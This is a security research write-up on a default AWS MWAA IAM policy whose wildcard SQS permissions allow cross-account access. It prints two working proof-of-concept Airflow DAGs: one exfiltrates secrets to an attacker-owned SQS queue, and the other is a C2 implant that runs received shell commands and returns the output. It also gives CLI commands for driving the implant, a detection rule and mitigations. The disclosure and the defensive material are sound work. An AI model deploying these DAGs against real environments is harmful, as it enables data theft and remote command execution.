Skip to content

AWS MWAA - Execution Role SQS Data Exfiltration and Other Attack Vectors

Summary

Amazon Managed Workflows for Apache Airflow (MWAA) uses a default, mandatory IAM execution role configuration that presents multiple, severe security risks. The policy required for the service to function grants broad, cross-account permissions to Amazon SQS. While this is most obviously a data exfiltration vector, it also enables attackers to establish persistent command and control channels, conduct denial-of-service attacks, and chain exploits against other AWS accounts.

Link to AWS Docs

The Default Configuration Flaw

When an MWAA environment is created, it requires an IAM execution role to interact with other AWS services. A key part of this interaction is with Amazon SQS, which MWAA uses for task queuing.

Because the underlying SQS queues are provisioned by AWS in a separate, AWS-controlled account, the customer does not know the account ID. To allow the execution role to communicate with these queues, the official AWS documentation provides the following IAM policy statement:

{
    "Effect": "Allow",
    "Action": [
        "sqs:ChangeMessageVisibility",
        "sqs:DeleteMessage",
        "sqs:GetQueueAttributes",
        "sqs:GetQueueUrl",
        "sqs:ReceiveMessage",
        "sqs:SendMessage"
    ],
    "Resource": "arn:aws:sqs:us-east-1:*:airflow-celery-*"
}

This policy is present in both the "Sample policy for a customer-managed key" and "Sample policy for an AWS-owned key" in the official AWS MWAA documentation.

Crucially, this configuration is mandatory for the service to operate. Any attempt to tighten this policy, for example by removing the wildcard * from the account ID or restricting the SQS actions, will cause the MWAA environment to fail. The scheduler will be unable to queue tasks for the workers, effectively breaking the entire workflow orchestration service. This leaves defenders with no direct IAM-based method to fix the vulnerability without disabling the service.

Why This is a Security Risk

The vulnerability lies in the combination of permissive actions and an overly broad resource scope:

  1. Bidirectional Actions: The policy allows both sending (SendMessage) and receiving (ReceiveMessage) of messages.
  2. Wildcard Account ID (*): The Resource ARN contains a wildcard for the AWS Account ID, allowing interaction with any AWS account.
  3. Wildcard Queue Name (airflow-celery-*): The permission applies to any queue in any account, as long as its name begins with the prefix airflow-celery-.

Primary Attack Vector: Data Exfiltration

The most direct exploit is to steal sensitive data. An attacker with DAG-write access can use the sqs:SendMessage permission to send any data the execution role can access to an SQS queue in an attacker-controlled AWS account.

Attack Execution Flow

  1. Attacker's Setup: The attacker creates an SQS queue in their own AWS account (e.g., airflow-celery-exfil-data).
  2. Malicious DAG Creation: The attacker crafts a Python DAG. This DAG uses boto3 to collect sensitive data (e.g., from S3, Secrets Manager, or databases).
  3. Exploiting the Role: The DAG then calls send_message, targeting the attacker's queue. The overly permissive IAM role allows this action, sending the data out of the victim's environment.

Why This Method is Effective

  • Bypasses Network Controls: This technique does not rely on direct internet egress from the MWAA VPC. It uses AWS API endpoints, which are often allowed even when other outbound traffic is blocked.
  • Appears as Legitimate Traffic: The API call (sqs:SendMessage) is a normal action for the MWAA role, making it difficult to detect.
  • Default, Not Misconfigured: This is the standard, documented setup.

Other Attack Vectors Enabled by the Policy

The bidirectional and administrative permissions in the SQS policy enable attacks that are far more dangerous than simple data theft.

1. Command and Control (C2) Channel

This is the most severe risk. The policy allows for a fully functional, bidirectional C2 channel, giving an attacker persistent and interactive access to the MWAA environment. An attacker can plant a long-running DAG that acts as a covert "implant" inside the victim's VPC.

  • Ingress (Receiving Commands): The sqs:ReceiveMessage permission allows the malicious DAG to periodically poll an attacker-controlled SQS queue (e.g., airflow-celery-c2-commands). The attacker sends commands to this queue, such as list_s3_buckets, scan_internal_network:10.0.0.0/16, or get_secret:prod/db/creds.
  • Egress (Sending Results): The sqs:SendMessage permission allows the DAG to execute the received command and send the output back to a different attacker-controlled SQS queue (e.g., airflow-celery-c2-results).

This creates a powerful, asynchronous C2 mechanism. The attacker can issue commands at any time, and the implant DAG will pick them up on its next poll cycle. This provides deep, ongoing visibility and control within the victim's network, all facilitated through SQS API calls that bypass traditional network firewalls and egress monitoring.

Abusing Other Default Permissions via C2

Once the SQS C2 channel is established, it becomes a conduit to abuse other permissions granted to the MWAA execution role. The attacker doesn't need a direct connection; they simply send commands to the implant DAG, which then executes actions on their behalf.

  • S3 Access (s3:GetObject*, s3:List*): The execution role requires read access to the DAGs S3 bucket. An attacker can command the implant to list all accessible buckets and read any file within them. This includes not just DAG source code but also any other data stored in those buckets, such as configuration files, scripts, or sensitive business data. The implant acts as an in-VPC proxy to read this data and stream it out via the SQS C2 channel.
  • KMS Decryption (kms:Decrypt): This is a critical enabler for data theft. If data in S3 is encrypted using a KMS key that the execution role has access to, the attacker can command the implant to first read the encrypted file from S3 and then use its kms:Decrypt permission to decrypt the data in memory. The now-plaintext data can be exfiltrated. The attacker never needs to steal the KMS key itself; they simply abuse the role that is authorized to use it.
  • Airflow Connections (Implicit Permissions): This is one of the most impactful abuse cases. Airflow stores connection details (database hostnames, usernames, passwords, API keys) for external systems. A C2 implant can be commanded to use Airflow's internal libraries to retrieve these credentials. It can then connect from within the MWAA VPC to production databases, data warehouses, or third-party APIs using these high-privilege credentials. The implant can dump entire tables from a production RDS database or pull data from an API, then funnel the results out through the SQS channel. The execution role effectively becomes a gateway to pivot and abuse the trust and network position of the entire Airflow environment.

2. Denial of Service (DoS)

  • Internal Service Disruption: A malicious DAG can weaponize the sqs:DeleteMessage permission to attack the MWAA service itself. While the exact SQS queue ARN is not public, a script could potentially discover it through environment variables or by listing queues. By receiving and immediately deleting messages from the legitimate MWAA queue, the DAG can create a race condition where Celery workers never receive their tasks. This would effectively halt all legitimate data pipelines and workflows, leading to operational chaos.
  • Cross-Account Billing DoS: The sqs:SendMessage permission can be used to attack another, unrelated AWS account. An attacker could identify a target queue in a third-party account (named airflow-celery-victim-queue) that triggers a costly downstream service like a Lambda function or auto-scaling container group. The attacker's DAG could then send millions of junk messages to this queue, triggering a massive number of invocations and inflicting a severe, unexpected financial cost on the target organization.

3. Cross-Account Attack Chaining (Event Injection)

This attack uses a compromised MWAA environment in Account A as a pivot to attack a service in Account B. Many event-driven architectures use SQS as a buffer. If an attacker discovers that an application in Account B uses a queue named airflow-celery-ingest to receive trusted events, they can inject malicious ones. The DAG in Account A could craft a carefully formatted JSON message designed to exploit a vulnerability in Account B's processing logic. This could lead to:

  • SQL Injection: If the message content is used to build a database query.
  • Remote Code Execution (RCE): If the message is processed by a service with a deserialization or command injection vulnerability.
  • Logic Flaws: If the message triggers unintended state changes in the target application.

The attack is particularly insidious because from Account B's perspective, the event appears to come from a legitimate SQS source, with no trail leading back to the compromised MWAA environment in Account A.

4. Infrastructure Reconnaissance

The sqs:GetQueueUrl and sqs:GetQueueAttributes permissions can be turned into a scanner. An attacker can write a DAG that iterates through a list of known or suspected AWS account IDs. For each ID, the script would attempt to resolve the URL for queues like airflow-celery-prod, airflow-celery-dev, etc. A successful response confirms the existence of another MWAA environment or a similarly named service. This allows an attacker to quietly map out potential targets across different organizations without sending a single network packet to them, building a valuable list for future attacks.

Proof of Concept (POC) DAG for Data Exfiltration

Educational Content Only

The following DAG is a proof-of-concept demonstrating the exfiltration attack. It simulates fetching a "secret" and sending it to an SQS queue controlled by an attacker. This code is for educational and defensive purposes only.

import json
from datetime import datetime

import boto3
from airflow.models.dag import DAG
from airflow.operators.python import PythonOperator

# --- Attacker-Controlled Parameters ---
# The attacker would replace these with their own values.
ATTACKER_AWS_ACCOUNT_ID = "123456789012"
ATTACKER_QUEUE_NAME = "airflow-celery-exfil-data"
ATTACKER_REGION = "us-east-1"
# -------------------------------------

def exfiltrate_data_via_sqs():
    """
    This function simulates the core of the attack.
    1. It gathers sensitive data accessible by the execution role.
    2. It sends this data to an SQS queue in an external AWS account.
    """
    print("Starting data exfiltration task...")

    # Step 1: Simulate collecting sensitive data.
    # In a real attack, this could be reading from an S3 bucket,
    # a secret from Secrets Manager, or database credentials.
    sensitive_data = {
        "source_account": "victim-account",
        "secret_key": "AWS_DUMMY_SECRET_KEY_abc123",
        "db_password": "ProdPassword123!",
        "notes": "This data was exfiltrated via MWAA SQS policy."
    }
    print("Collected sensitive data.")

    # Step 2: Prepare for exfiltration.
    # The queue URL is constructed to point to the attacker's queue.
    attacker_queue_url = f"https://sqs.{ATTACKER_REGION}.amazonaws.com/{ATTACKER_AWS_ACCOUNT_ID}/{ATTACKER_QUEUE_NAME}"
    try:
        # The boto3 client will automatically use the permissions
        # of the MWAA execution role.
        sqs_client = boto3.client("sqs", region_name=ATTACKER_REGION)

        print(f"Sending data to attacker's SQS queue: {attacker_queue_url}")

        # Step 3: Send the data.
        # The IAM policy with "arn:aws:sqs:*:*:airflow-celery-*" allows this call.
        response = sqs_client.send_message(
            QueueUrl=attacker_queue_url,
            MessageBody=json.dumps(sensitive_data),
            MessageAttributes={
                'Author': {
                    'DataType': 'String',
                    'StringValue': 'MaliciousDAG'
                }
            }
        )

        print(f"Successfully sent message. Message ID: {response['MessageId']}")
        print("Exfiltration successful.")

    except Exception as e:
        print(f"An error occurred during exfiltration: {e}")
        # In a real scenario, an attacker might add more robust error handling.
        raise

with DAG(
    dag_id="poc_mwaa_sqs_exfiltration",
    start_date=datetime(2023, 1, 1),
    schedule_interval=None,
    catchup=False,
    tags=["security", "poc"],
) as dag:
    exfiltrate_task = PythonOperator(
        task_id="exfiltrate_sensitive_data",
        python_callable=exfiltrate_data_via_sqs,
    )

Proof of Concept (POC) DAG for Command and Control (C2)

The following DAG establishes a persistent implant that polls an attacker's SQS queue for commands, executes them within the MWAA worker environment, and returns the results to another attacker queue.

Attacker Setup and Interaction

  1. Create Queues: The attacker creates two SQS queues in their own AWS account:
  2. airflow-celery-c2-commands (for sending commands to the implant).
  3. airflow-celery-c2-results (for receiving output from the implant).
  4. Deploy DAG: The attacker uploads the implant DAG to the victim's MWAA environment.
  5. Send Command: The attacker uses the AWS CLI to send a command to the c2-commands queue.

    aws sqs send-message \
        --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/airflow-celery-c2-commands \
        --message-body "ls -la /"
    

  6. Receive Result: After the DAG runs, the attacker polls the c2-results queue to get the output.

    aws sqs receive-message \
        --queue-url https://sqs.us-east-1.amazonaws.com/123456789012/airflow-celery-c2-results
    

Implant DAG Code

Malicious Code Example

This code demonstrates how an attacker could establish a C2 channel. Do not deploy this code in production environments.

import base64
import json
import subprocess
from datetime import datetime, timedelta

import boto3
from airflow.models.dag import DAG
from airflow.operators.python import PythonOperator

# --- Attacker-Controlled C2 Parameters ---
ATTACKER_AWS_ACCOUNT_ID = "123456789012"
ATTACKER_REGION = "us-east-1"
COMMAND_QUEUE_NAME = "airflow-celery-c2-commands"
RESULTS_QUEUE_NAME = "airflow-celery-c2-results"
# -----------------------------------------

def c2_implant_task():
    """
    This function is the C2 implant. It runs periodically.
    1. Polls an SQS queue for a command.
    2. Executes the command in a subprocess.
    3. Sends the output (stdout/stderr) back to another SQS queue.
    """
    sqs_client = boto3.client("sqs", region_name=ATTACKER_REGION)
    command_queue_url = f"https://sqs.{ATTACKER_REGION}.amazonaws.com/{ATTACKER_AWS_ACCOUNT_ID}/{COMMAND_QUEUE_NAME}"
    results_queue_url = f"https://sqs.{ATTACKER_REGION}.amazonaws.com/{ATTACKER_AWS_ACCOUNT_ID}/{RESULTS_QUEUE_NAME}"

    print(f"C2 Implant: Polling for commands from {command_queue_url}")

    try:
        # 1. Poll for a command message
        response = sqs_client.receive_message(
            QueueUrl=command_queue_url,
            MaxNumberOfMessages=1,
            WaitTimeSeconds=10 # Use long polling
        )

        if "Messages" not in response:
            print("C2 Implant: No new commands found.")
            return

        message = response["Messages"][0]
        receipt_handle = message["ReceiptHandle"]
        command = message["Body"]
        print(f"C2 Implant: Received command: '{command}'")

        # 2. Execute the command
        try:
            process = subprocess.run(
                command,
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                text=True,
                timeout=60
            )
            stdout = process.stdout
            stderr = process.stderr
            return_code = process.returncode
            print(f"C2 Implant: Command executed with return code {return_code}")

        except Exception as e:
            stdout = ""
            stderr = f"Command execution failed: {str(e)}"
            return_code = -1

        # 3. Send results back
        result_payload = {
            "command": command,
            "return_code": return_code,
            # Encode to handle non-JSON-safe characters
            "stdout": base64.b64encode(stdout.encode('utf-8')).decode('ascii'),
            "stderr": base64.b64encode(stderr.encode('utf-8')).decode('ascii'),
        }

        sqs_client.send_message(
            QueueUrl=results_queue_url,
            MessageBody=json.dumps(result_payload)
        )
        print(f"C2 Implant: Sent results to {results_queue_url}")

        # 4. Delete the command message so it's not processed again
        sqs_client.delete_message(
            QueueUrl=command_queue_url,
            ReceiptHandle=receipt_handle
        )
        print("C2 Implant: Deleted command message.")

    except Exception as e:
        print(f"C2 Implant: An unexpected error occurred: {e}")


with DAG(
    dag_id="c2_implant_sqs",
    start_date=datetime(2023, 1, 1),
    # Run every 5 minutes to check for new commands
    schedule_interval=timedelta(minutes=5),
    catchup=False,
    tags=["security", "c2"],
) as dag:
    c2_task = PythonOperator(
        task_id="c2_implant_task",
        python_callable=c2_implant_task,
    )

Detection and Mitigation

AWS Config Detection Rule

A custom AWS Config rule can help detect MWAA environments with the vulnerable SQS wildcard configuration:

# AWS Config Guard Rule: Detects SQS Wildcard Account ID in a specific role pattern
#
# This rule checks IAM roles matching a specific naming convention
# for any IAM policy (inline or managed) that allows SQS actions on a resource ARN
# with a wildcard (*) in the Account ID position.
#
# This is for detection of MWAA wildcard default configuration
# cross-account vulnerability.

# 1. DEFINE PATTERNS
# ---
# Regex to match your specific role name.
# Allows for env names with letters, numbers, and hyphens.
let target_role_pattern = /.*airflow.*/

# Regex to find any SQS action (e.g., "sqs:SendMessage", "sqs:*")
let sqs_action_pattern = /^sqs:.*/

# Regex to find the vulnerable SQS ARN pattern (wildcard in account ID)
let bad_sqs_arn_pattern = /^arn:[^:]*:sqs:[^:]+:\*:.*/

# 2. DEFINE RULE
# ---
# This rule only applies to IAM Roles that match your target_role_pattern
rule check_sqs_wildcard_for_target_role when
    resourceType == "AWS::IAM::Role"
    and configuration.roleName == %target_role_pattern
{
    # 3. CHECK INLINE POLICIES
    # ---
    when supplementaryConfiguration exists and supplementaryConfiguration.InlinePolicies exists {
        supplementaryConfiguration.InlinePolicies[*] {
            let policy_statements = this.PolicyDocument.Statement

            when %policy_statements exists {
                %policy_statements[*] {
                    # Check for "Allow" statements with SQS actions and bad resources
                    when Effect == "Allow"
                         and Action exists
                         and Resource exists
                    {
                        let actions = when Action is_string { [ Action ] } else { Action }
                        let resources = when Resource is_string { [ Resource ] } else { Resource }

                        # Check if any action is an SQS action
                        let has_sqs_action = some %actions[*] {
                            this == %sqs_action_pattern or this == "*"
                        }

                        # If it has an SQS action, check all its resources
                        when %has_sqs_action {
                            %resources[*] {
                                # If any resource matches the bad pattern, flag it
                                when this == %bad_sqs_arn_pattern {
                                    <<
                                        VIOLATION: Role '{%configuration.roleName}' has an INLINE policy with an SQS wildcard resource ARN.
                                        Vulnerable Resource: {this}
                                        This allows SQS actions against queues in ANY AWS account.
                                    >>
                                }
                            }
                        }
                    }
                }
            }
        }
    } # End of inline policy check

    # 4. CHECK MANAGED POLICIES
    # ---
    when supplementaryConfiguration exists and supplementaryConfiguration.ManagedPolicies exists {
        supplementaryConfiguration.ManagedPolicies[*] {
            let policy_name = this.PolicyName
            let policy_statements = this.PolicyDocument.Statement

            when %policy_statements exists {
                %policy_statements[*] {
                    # Check for "Allow" statements with SQS actions and bad resources
                    when Effect == "Allow"
                         and Action exists
                         and Resource exists
                    {
                        let actions = when Action is_string { [ Action ] } else { Action }
                        let resources = when Resource is_string { [ Resource ] } else { Resource }

                        # Check if any action is an SQS action
                        let has_sqs_action = some %actions[*] {
                            this == %sqs_action_pattern or this == "*"
                        }

                        # If it has an SQS action, check all its resources
                        when %has_sqs_action {
                            %resources[*] {
                                # If any resource matches the bad pattern, flag it
                                when this == %bad_sqs_arn_pattern {
                                    <<
                                        VIOLATION: Role '{%configuration.roleName}' has a MANAGED policy ('{%policy_name}') with an SQS wildcard resource ARN.
                                        Vulnerable Resource: {this}
                                        This allows SQS actions against queues in ANY AWS account.
                                    >>
                                }
                            }
                        }
                    }
                }
            }
        }
    }
}

Monitoring and Detection Strategies

  1. CloudTrail Monitoring: Monitor for unusual SQS API calls from MWAA execution roles
  2. VPC Flow Logs: Look for unexpected network patterns from MWAA subnets
  3. DAG Code Review: Implement strict review processes for DAG deployments
  4. Network Segmentation: Isolate MWAA environments in dedicated VPCs with restrictive egress rules

Mitigation Recommendations

  1. Network Controls: Implement strict VPC egress filtering to prevent unauthorized SQS API calls
  2. DAG Security: Establish secure DAG deployment pipelines with code review and scanning
  3. Least Privilege: Regularly audit and minimize the additional permissions granted to MWAA execution roles
  4. Monitoring: Deploy comprehensive logging and monitoring for MWAA environments
  5. AWS Support: Engage AWS support to discuss potential service-level mitigations for this configuration requirement

Research conducted by [Your Name] - [Date]